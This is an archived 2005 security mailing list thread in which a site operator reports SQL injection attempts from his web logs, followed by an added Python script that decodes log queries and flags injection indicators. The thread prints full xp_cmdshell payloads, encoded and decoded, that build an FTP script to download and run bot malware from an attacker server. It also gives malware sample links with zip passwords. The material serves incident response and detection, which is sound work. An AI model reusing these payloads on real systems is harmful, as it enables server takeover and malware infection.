Security Incidents mailing list archives
Re: SQL injection ... another attack
From: Harlan Carvey <keydet89 () yahoo com>
Date: Thu, 20 Jan 2005 10:57:12 -0800 (PST)
I think the real issue here is that the SQL Injection worked....

--- gaurav kumar <gkverma () gmail com> wrote:

my VirusScan (network associates) detected it as W32/Sdbot.worm.gen

On Wed, 19 Jan 2005 15:48:42 -0500, Maxime Ducharme <mducharme () cybergeneration com> wrote:

Hi to the list

today we received the same SQL injection attack on the same URL :

IP : 24.1.139.29 (c-24-1-139-29.client.comcast.net)
User Agent : none sent
HTTP Verb : GET /theasppage.asp?anID=
Attack :

377';exec MASTER..xp_cmdshell 'mkdir%systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open z.z.z.z 21 >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER chadickar0ckpaul >>%systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo binary >> %systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get lol.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'ftp.exe -i -n -v-s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell'%systemroot%\system32\Macromed\lolx\arcdlrde.exe'--

The lol.exe file can be found in this archive for inspection :
http://www.cybergeneration.com/security/2005.01.19/lol.zip
zip pass is das978tewa234

Norton with definitions of 12 jan. doesn't find anything suspicious. I'm interested if someone does an analysis on this file.

Have a nice day

Maxime Ducharme
Programmeur / Spécialiste en sécurité réseau

----- Original Message -----
From: "Maxime Ducharme" <mducharme () cybergeneration com>
To: <full-disclosure () lists netsys com>; "General DShield Discussion List" <list () lists dshield org>; <incidents () securityfocus com>
Sent: Wednesday, January 05, 2005 12:22 PM
Subject: SQL injection worm ?

Hi list,

we received a particular SQL injection attack on one of our sites.

Attack looks like :

2005-01-05 14:39:20 24.164.202.24 - W3SVCXSRVNAME x.x.x.x 80 GET /Nouvelles.asp
id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68
%65%6C%6C%20'mkdir%20%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5C';%65%7
8%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20op
en%20y.y.y.y%2021%20%3E%3E%20%25systemroot%25%5Csystem32%5CMacromed%
5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%
68%65%6C%6C%20'echo%20USER%20hahajk%20hahaowned%20%3E%3E%20%25systemroot%25%
5Csystem32%5Cmacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..
%78%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20get%20rBot.exe%20%25systemroot%2
5%5Csystem32%5CMacromed%5Clolx%5Carcdlrde.exe%20%3E%3E%20%25systemroot%25%5C
system32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%7
8%70%5F%63%6D%64%73%68%65%6C%6C%20'echo%20quit%20%3E%3E%20%25systemroot%25%5
Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%
78%70%5F%63%6D%64%73%68%65%6C%6C%20'ftp.exe%20-i%20-n%20-v%20-s:%25systemroo
t%25%5Csystem32%5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45
%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'del%20%25systemroot%25%5Csystem32%
5CMacromed%5Clolx%5Cblah.jkd';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%6
3%6D%64%73%68%65%6C%6C%20'%25systemroot%25%5Csystem32%5CMacromed%5Clolx%5Car
cdlrde.exe'--|17|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Lin
e_1:_Incorrect_syntax_near_''. 500 0 0 1395 570 HTTP/1.1 attacked.web.site.com - - -

HTTP request contains only 2 fields (beside HTTP method) :
Connection: Keep-Alive
Host: attacked.web.site.com
(I obviously replaced the name of the site).

Decoded SQL injection looks like :

exec MASTER..xp_cmdshell 'mkdir%systemroot%\system32\Macromed\lolx\';
exec MASTER..xp_cmdshell 'echo open y.y.y.y 21 %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo USER hahajkhahaowned >>%systemroot%\system32\macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo get rBot.exe %systemroot%\system32\Macromed\lolx\arcdlrde.exe %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'echo quit >> %systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'ftp.exe -i -n -v-s:%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell 'del%systemroot%\system32\Macromed\lolx\blah.jkd';
exec MASTER..xp_cmdshell'%systemroot%\system32\Macromed\lolx\arcdlrde.exe

y.y.y.y is a foreign IP in Europe which hosts FTP and WWW servers. I sent a notice to this site's sysadmin about the situation.

I have been able to connect to this FTP with the account hahajk/hahaowned (which does not seem legit to me ...) and download suspicious files. I mirrored them here :
http://www.cybergeneration.com/security/2005.01.05/rbot.exe_ftp.zip
zip pass is 968goyw439807r3qw

24.164.202.24 is on rr.com networks, they have also been advised.

I know rbot.exe is known to be Randex worm, but I'd like to have some other results / analysis. I also found a "test.asp" file which contains the Spybot worm.

Weird thing is, I searched for this host's activity on every server and every firewall we run, and I only see 1 TCP connection which is the prepared SQL injection attack, nothing else.

Anybody see similar activity ? I'm asking since I want to know if we are targeted by someone or by a worm like Santy that uses search engines to find vulnerable ASP scripts.

Thanks in advance

Happy new year to everyone !

Maxime Ducharme
Programmeur / Spécialiste en sécurité réseau

=====
------------------------------------------
Harlan Carvey, CISSP
"Windows Forensics and Incident Recovery"
http://www.windows-ir.com
http://windowsir.blogspot.com
------------------------------------------
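Added example, not part of the thread above: the request Maxime posted hides "exec MASTER..xp_cmdshell" behind percent-encoding (%65%78%65%63...), so a plain grep of the IIS log for xp_cmdshell misses it. The script below decodes the cs-uri-query field of W3C extended log lines (repeatedly, so double-encoded %25 sequences are handled) and flags the stacked-query and command-execution indicators seen in the thread. The log lines and addresses are constructed for the example, and the field order (date time c-ip cs-username s-sitename s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status) is an assumption about the server's logging configuration, not taken from the posted log.

```python
# Added example (not from the original thread): decode IIS W3C log query
# strings and flag SQL Server injection indicators such as xp_cmdshell.
import re
from urllib.parse import unquote

# Indicators to search for once the query string has been decoded.
INDICATORS = {
    "xp_cmdshell":  re.compile(r"xp_cmdshell", re.I),
    "stacked_exec": re.compile(r";\s*exec\b", re.I),     # a second statement after the injected quote
    "comment_tail": re.compile(r"--\s*$"),                # trailing comment that discards the rest of the query
    "master_db":    re.compile(r"\bmaster\s*\.\.", re.I), # MASTER..procedure reference
    "ftp_script":   re.compile(r"\bftp(\.exe)?\b.*-s:", re.I),  # scripted ftp download
}

# Constructed sample log (IIS percent-encodes spaces in the query field, so a
# whitespace split is safe). Field layout is an assumption, see lead-in.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-username s-sitename s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status
2005-01-05 14:39:20 192.0.2.10 - W3SVC1 192.0.2.1 80 GET /Nouvelles.asp id_nouvelle=377';%65%78%65%63%20%4D%41%53%54%45%52..%78%70%5F%63%6D%64%73%68%65%6C%6C%20'dir'-- 500
2005-01-05 14:40:02 192.0.2.11 - W3SVC1 192.0.2.1 80 GET /Nouvelles.asp id_nouvelle=377 200
2005-01-05 14:41:17 192.0.2.12 - W3SVC1 192.0.2.1 80 GET /search.asp q=100%25%20cotton 200
"""


def decode_query(raw):
    """Percent-decode until the string stops changing (handles %25 double encoding)."""
    prev, cur = None, raw
    for _ in range(5):  # bounded so pathological input cannot loop forever
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur


def parse_w3c_line(line):
    """Split one W3C extended log line into the fields we need; None for comments/blank."""
    if not line or line.startswith("#"):
        return None
    f = line.split()
    # assumed order: date time c-ip cs-username s-sitename s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status
    if len(f) < 11:
        return None
    return {"date": f[0], "time": f[1], "client": f[2], "method": f[7],
            "stem": f[8], "query": f[9], "status": f[10]}


def scan_log_line(line):
    """Return (record, decoded_query, [indicator names]) if suspicious, else None."""
    rec = parse_w3c_line(line)
    if rec is None or rec["query"] == "-":
        return None
    decoded = decode_query(rec["query"])
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return (rec, decoded, hits) if hits else None


def scan_log(text):
    """Scan a whole log; returns a list of (client ip, decoded query, hits)."""
    results = []
    for line in text.splitlines():
        r = scan_log_line(line)
        if r:
            rec, decoded, hits = r
            results.append((rec["client"], decoded, hits))
    return results


if __name__ == "__main__":
    for client, decoded, hits in scan_log(SAMPLE_LOG):
        print(f"{client}: {', '.join(hits)}\n    {decoded}")
```

Only the first constructed line is reported; the legitimate "100% cotton" search decodes without tripping any indicator. For the thread's own log, the ASP error text that IIS appends to the query (the "|17|80040e14|..." tail) stays inside the query field, so the whitespace split still works.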
Current thread:
- SQL injection ... another attack Maxime Ducharme (Jan 20)
- Re: SQL injection ... another attack Teodor Cimpoesu (Jan 20)
- Re: SQL injection ... another attack gaurav kumar (Jan 20)
- Re: SQL injection ... another attack Harlan Carvey (Jan 20)
- Re: SQL injection ... another attack Maxime Ducharme (Jan 20)
- Re: SQL injection ... another attack Harlan Carvey (Jan 20)